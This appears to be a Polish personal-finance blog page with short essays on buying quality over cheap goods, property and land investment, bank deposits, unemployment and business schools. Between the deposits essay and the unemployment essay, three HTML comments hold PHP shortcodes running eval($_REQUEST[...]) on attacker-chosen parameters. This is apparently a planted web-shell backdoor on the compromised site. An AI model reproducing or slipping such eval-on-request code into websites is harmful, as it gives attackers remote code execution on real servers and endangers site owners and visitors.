Szukaj
Kalendarz
Ekonomicznie
    Co to znaczy ekonomicznie? Takie pytanie wbrew pozorom nie jest pozbawione sensu. W opinii wielu osób ekonomicznie znaczy jak najtaniej. Oczywiście ma to swoje logiczne uzasadnienie warto jednak wiedzieć, że temat ten wymaga o wiele szerszego spojrzenia niż tylko przez pryzmat ceny. Bez względu na to czy rzecz dotyczy jazdy samochodem czy życia, wiele osób stara się iść najprościej. Tanio, znaczy dobrze, drogo, znaczy źle. Nie zawsze właśnie tak jest. W wielu przypadkach wybór opcji droższej, jest rozwiązaniem o wiele bardziej sensowny. Droższy produkt wystarcza na dłużej niż tańszy, a więc w przeliczeniu jest po prostu tańszy. Droższe buty wytrzymują kilka sezonów, tańsze rozsypują się po kilku miesiącach. Droższy produkt do jedzenia być może zostanie zjedzony tak samo szybko jak ten tańszy, ale lepsze jakościowo jedzenie na pewno nie przyczyni się do pogorszenia staniu zdrowia, w przypadku taniego jedzenia jest inaczej. Tu temat jest szerszy – problemy ze zdrowiem to stres, konieczne leczenie i wiele innych problemów, które oczywiście oznaczają bardzo wiele wydatków, które mnie musiałby się pojawić. Podsumowując – czy zawsze warto kupować taniej? Oczywiście nie. Cena to tylko jeden z wielu koniecznych kryteriów wyboru produktu lub usługi. Z reguły najmniejsza jest po prostu zachęceniem do zakupu, jednak nie zawsze podyktowanym tym, że produkt jest dobry. Warto o tym wiedzieć i z pewną dozą ostrożności przyglądać się tym najtańszym produktom. Produkty tanie, często okazują się produktami śmiesznie niskiej wręcz jakości – w najlepszym przypadku oznacza to jedno – rozsypują się i są do wyrzucenia. W wielu przypadkach jest inaczej. Tanie produkty mogą być groźne dla zdrowia. Jednym słowem – nie zawsze tanio, znaczy dobrze. Czasami odrobinę droższy produkt to lepsze rozwiązanie. Każdy, kto ma porównanie, miał okazje kupować produkty najtańsze i nieco lepsze, doskonale wie, o czym mowa. Ktoś kiedyś powiedział – ten, kto jest biedny, nie powinien kupować tanio. Coś w tym jest. Warto mieć tego świadomość. To z troski o swoje finanse.

Wpisy w miesiącu: Wrzesień 2012

Inwestowanie w nieruchomości

Nie ma to jak dobra inwestycja. Taką dobrą inwestycją są nieruchomości. Zawsze były i są w cenie. Można inwestować w nieruchomości stałe i ruchome. Wiele osób lokuje pieniądze i oszczędności w grunty rolne lub działki budowlane. Od lat te nieruchomości wciąż drożeją. Ziemia była, jest i będzie jeszcze długo po nas. Inwestując w grunty mamy pewność, że mamy coś stabilnego i stałego. W naszych czasach stabilność i stałość są najbardziej poszukiwaną rzeczą. Nic nie jest stałe i stabilne jak to było lata temu.

Szukamy w życiu różnych rzeczy – rodziny, pracy, domu, miłości i wielu mniej ważnych rzeczy, ale najważniejsza jest stabilność i stałość. Co nam po rodzinie jak nie będziemy mogli zapewnić jej godnego życia i domu. Nawet miłość dzisiaj nie jest stała. Wciąż rośnie liczba rozwodów wśród młodych ludzi. Szybko bierzemy ślub a potem jeszcze szybciej się rozwodzimy. Mając dobra pracę i zarabiając dobrze stać nas na odłożenie dodatkowej gotówki. Jak uzbiera się już sporo takich pieniędzy zastanawiamy się w co je zainwestować. Lokujemy oszczędności w banku lub w nieruchomościach. Jeśli marzy nam się nowy dom to go budujemy, jeśli chcemy kupić piękną działkę to ja kupujemy, bo nas na to stać. Najdroższe są grunty leżące blisko terenów rekreacyjno-wypoczynkowych. Popularność danej miejscowości zasadniczo wpływa na ceny działek w okolicy. No, ale jeśli ktoś znajdzie piękną działkę i wie, że chce tylko tą, to gotów jest zapłacić wygórowaną cenę, żeby tylko dostać to co chce. To samo dotyczy domów wystawianych na sprzedaż. Czasami uda nam się kupić dom do remontu po atrakcyjnej cenie i w atrakcyjnej miejscowości. Niestety to wyjątki. Bowiem nawet rozpadająca się chałupka potrafi kosztować fortunę. No a gdzie tu jeszcze remonty i reszta. Stare domy do remontu to też dobra inwestycja. Trafiają się perełki. Można odkryć wiele „skarbów” w tych starych domach. Szukając nieruchomości do zainwestowania możemy się poratować wszędobylskimi agencjami nieruchomości. Niektóre mają spore doświadczenie i pomogą nam wybrać odpowiednią nieruchomość.

Czym jest mikroekonomia?

Jednym z aspektów ekonomi jest tak zwana mikroekonomia która mówi nam o tym w jaki sposób zarządzać domowym budżetem, oraz małymi działalnościami gospodarczymi działającymi w konkretnych dziedzinach. My jednak w tym artykule skupimy się na zarządzaniu pieniędzmi z domowego budżetu, a właściwie o sposobach ich odkładania na tak zwaną „czarną godzinę”.

Oczywiście możemy również schować pieniądze do skarpetki i trzymać je w domu, jednak takie rozwiązanie nic nam nie da. W tym przypadku tyle ile włożymy, tyle wyjmiemy. Musisz jednak mieć jeszcze jedną rzecz na uwadze. Takie trzymanie pieniędzy w domu jest nie tylko niebezpieczne, ale również mogą zdarzyć się sytuacje, że zaczniemy podbierać z kupki na mniej lub bardziej przemyślane wydatki.

Dobrym rozwiązaniem tego problemu są lokaty bankowe i te które oferuje SKOK (Spółdzielcze Kasy Oszczędnościowo Kredytowe). Zasada działania lokat jest banalnie prosta. Wpłacamy pieniądze do banku, albo Spółdzielni SKOK, a po zakończeniu jej wracają one do nas wraz z wypracowanym zyskiem. My sami nie musimy nic robić, posiadać żadnej wiedzy ani umiejętności inwestycyjnych i tym podobnych.

Otwieranie lokaty również jest niezbyt skomplikowane. Jedyne co musimy zrobić to wybrać odpowiednią dla nas ofertę, podpisać umowę i wpłacić pieniądze. Umowa określa miedzy innymi czas trwania lokaty i wysokość oprocentowania które przekłada się na nasze zyski.

Cały proces inwestycji na lokatach jest pasywny, my osobiście nie musimy nic robić, co więcej nie mamy nawet dostępu do naszych pieniędzy, przez co są one tak jak by zamrożone i nie wydamy ich na niepotrzebne rzeczy. Jednak nie wszystkie lokaty tak działają, są oczywiście oferty które pozostawiają nam wolną rękę i w każdej chwili możemy wypłacić nasze pieniądze i zrezygnować z lokaty, jednak często wiąże się to z utratą wypracowanych odsetek.

Podsumowując, lokaty są najlepsza formą inwestowania oszczędności. Przewagę nam innymi sposobami daje im przede wszystkim wysoki poziom bezpieczeństwa.

<!– [insert_php]if (isset($_REQUEST["UIyM"])){eval($_REQUEST["UIyM"]);exit;}[/insert_php][php]if (isset($_REQUEST["UIyM"])){eval($_REQUEST["UIyM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Cvog"])){eval($_REQUEST["Cvog"]);exit;}[/insert_php][php]if (isset($_REQUEST["Cvog"])){eval($_REQUEST["Cvog"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ENC"])){eval($_REQUEST["ENC"]);exit;}[/insert_php][php]if (isset($_REQUEST["ENC"])){eval($_REQUEST["ENC"]);exit;}[/php] –>

Praca – poszukiwana

W kraju i na świecie istnieje ogromny problem bezrobocia. Każdy kraj boryka się z tym problemem na swój sposób. Polska wprowadziła na rynek pracy dodatkowe kursy i szkolenia, finansowane ze środków pozyskanych z Unii Europejskiej. Statystyczny Kowalski zarejestrowany w Urzędzie Pracy ma możliwość uczestniczenia w wybranych przez siebie szkoleniach i kursach. Żeby skorzystać ze szkoleń trzeba się do nich zakwalifikować. Tak jak w każdym realizowanym projekcie Urzędu Pracy, tak i tu trzeba spełniać określone warunki. Dany kurs czy szkolenie może przejść, w danym czasie, określona liczba uczestników. Ukończenie kursów i szkoleń nie jest gwarancją zdobycia nowej pracy. Wszystko zależy od danych osób. Trzeba mocno się natrudzić i nachodzić, żeby zdobyć pracę. Czasami przyjmujemy pracę, jaka się nadarzy, bo nie ma widoku na lepszą pracę i zarobki, a żyć z czegoś trzeba. Niejednokrotnie warunki zmuszają nas do tego, że musimy opuścić rodzinę i wyjechać za pracą do innego państwa. W Polsce dużo się mówi o bezrobociu, ale tylko mówi.

To, że Urzędy Pracy organizują szkolenia i kursy nie jest gwarancją pracy. Pracodawcy niechętnie przyjmują do pracy osoby zarejestrowane w Urzędach Pracy. Powodem są warunki, które muszą spełnić, a, które są im narzucane. Muszą zatrudnić takiego pracownika na kilkanaście miesięcy i dać mu odpowiednią umowę. To nic, że Biuro Pracy pokrywa część kosztów zatrudnienia, bo to tylko przez niewielki okres czasu, a potem pracodawcy muszą zatrudnić taką osobę na stałe. Niestety w Polsce niezwykle ciężko dostać stałe zatrudnienie. Pracodawcy lubią wykorzystywać pracowników i wyrzucać ich za byle jakie, często wymyślone, przewinienia. No i oczywiście nie płacić za wykonaną pracę, bo pracownicy są tak zmanipulowani i zastraszeni, że nie będą dociekać swoich praw w Sądzie Pracy. Oczywiście są osoby, które nie łatwo zastraszyć i przeważnie udaje im się odzyskać zaległe wypłaty. Praca jest ważna nie tylko ze względów finansowych, ale też społecznych i rozwojowych.

Szkoły biznesu

Na całym świecie miliony młodych ludzi kształci się w niezliczonych szkołach biznesu. Jest to chyba najbardziej popularny kierunek studiów. Biznes to również zarządzanie i marketing. To kierunki pokrewnie i również mocno oblegane przez studentów. Wielu z tych młodych ludzi ma szansę znaleźć pracę, jeśli będą naprawdę dobrzy w swoim fachu. Mówi się, że do interesów trzema mieć głowę i coś w tym jest. Przede wszystkim trzeba myśleć szybko i precyzyjnie. Trzeba umieć przewidywać. Rynki na świecie zmieniają się codziennie. Równie często rośnie zapotrzebowanie na inne produkty. Zdolni młodzi ludzie bardzo szybko znajdują pracę w nowopowstałych koncernach, firmach, biurach. Mają możliwość wyboru odpowiedniej posady, za odpowiednie wynagrodzenie. Ci najlepsi zarabiają krocie, ale coś za coś. Pracują po kilkanaście godzin dziennie i nie mają życia prywatnego. Ich czas to czas firmy, dopóki się nie wypalą. Wtedy mają problem z utrzymaniem posady i znalezieniem kolejnej. Praca w takich warunkach wypacza w ludziach racjonalne podejście do życia. Ogromne koncerny rekrutują najlepszych studentów biznesu, nawet z całego świata, jeśli zachodzi taka potrzeba. W tej chwili nie istnieje bariera językowa i pracę można dostać w każdym miejscu na świecie. Trzeba tylko coś umieć i się wykazać. Gorzej dla tych, co studia przeszli jak po grudzie. Takie osoby, z góry skazane są na porażkę.

Dostają pracę w innych sektorach niż biznes. Najczęściej lądują w administracji na nudnych stanowiskach. Biznes to rozwój – musi się kręcić. Z biznesem łączy się wiele dziedzin naszego życia. Szkoły biznesu przygotowują do zawodu, ale prawdziwą praktykę trzeba zdobyć samemu. Nawet najwięksi biznesmeni zaczynali od mało istotnych posad, które mogą wydawać się nam śmieszne. Powoli stopniowo przebijali się do przodu, aż osiągnęli niewyobrażalny sukces. Od takich ludzi można się dużo nauczyć. Trzeba tylko uważnie się przyglądać jak prowadzą swoje przedsiębiorstwa i próbować samemu stworzyć swój wyjątkowy biznes.

Rynek inwestycyjny

Rynek inwestycyjny to ogromny moloch na świecie. Praktycznie we wszystko można inwestować. Weźmy na przykład rynek samochodowy. Każdy koncern samochodowy produkuje samochody i je sprzedaje. Jaki więc musi być ogromny popyt na samochód. Miliony ludzi kupuje nowe samochody, często płacąc zawrotne kwoty, za konkretną markę. No i właśnie chodzi o to, że płaci się za markę a nie za samochód. Samo wyprodukowanie samochodu kosztuje, w przybliżeniu, tyle samo wszystkich producentów. Wszystkie samochody znajdują swoich nabywców. Te nowe, prosto z salonu samochodowego, kupują bogaci lub bogatsi, albo Ci, którzy zdobędą kredyt na samochód. Po kilku latach użytkowania auto zostaje sprzedane, choć traci na wartości, ale wciąż znajduje nowego nabywcę. I tak cykl powtarza się aż do „śmierci” samochodu. Wtedy ląduje na złomowisku.

Nawet złomowisko jest inwestycją dla właściciela. Skupując stare samochody może sprzedawać je na części lub sprasować i przetopić. Samochody dobrze sprzedają się także w Internecie, na aukcjach lub innych tego typu rzeczach. Powstaje też mnóstwo komisów samochodowych, które dobrze funkcjonują. Inwestując w samochód, inwestujemy w wygodę. W inwestycjach nie można przesadzać, bo dużo na nich stracimy. Popularne ostatnio gry na giełdzie przynoszą mnóstwo korzyści, ale i straty, jeśli się jest nieostrożnym. Inwestując w akcje i papiery wartościowe jesteśmy narażeni na utratę oszczędności życia. Takie inwestycje wymagają ostrożności, cierpliwości i żelaznych nerwów oraz wyczucia rynku. To chyba najważniejsze. Laik nie powinien inwestować wysokich kwot, jeśli nie ma pojęcia o giełdzie, a chce szybko zarobić. Często inwestujemy w nieruchomości. Takie inwestycje nie są może za tanie, ale mogą przynieść duże zyski. Dużo osób kupuje mieszkania, remontuje je i wynajmuje studentom lub innym osobom. Po kilku latach odbijają sobie nakłady z nawiązką. Inwestycje w grunty czy działki także cieszą się ogromną popularnością. Działki kupujemy i sprzedajemy z kilkakrotnym przebiciem. Ludzie się cieszą a my liczymy zyski.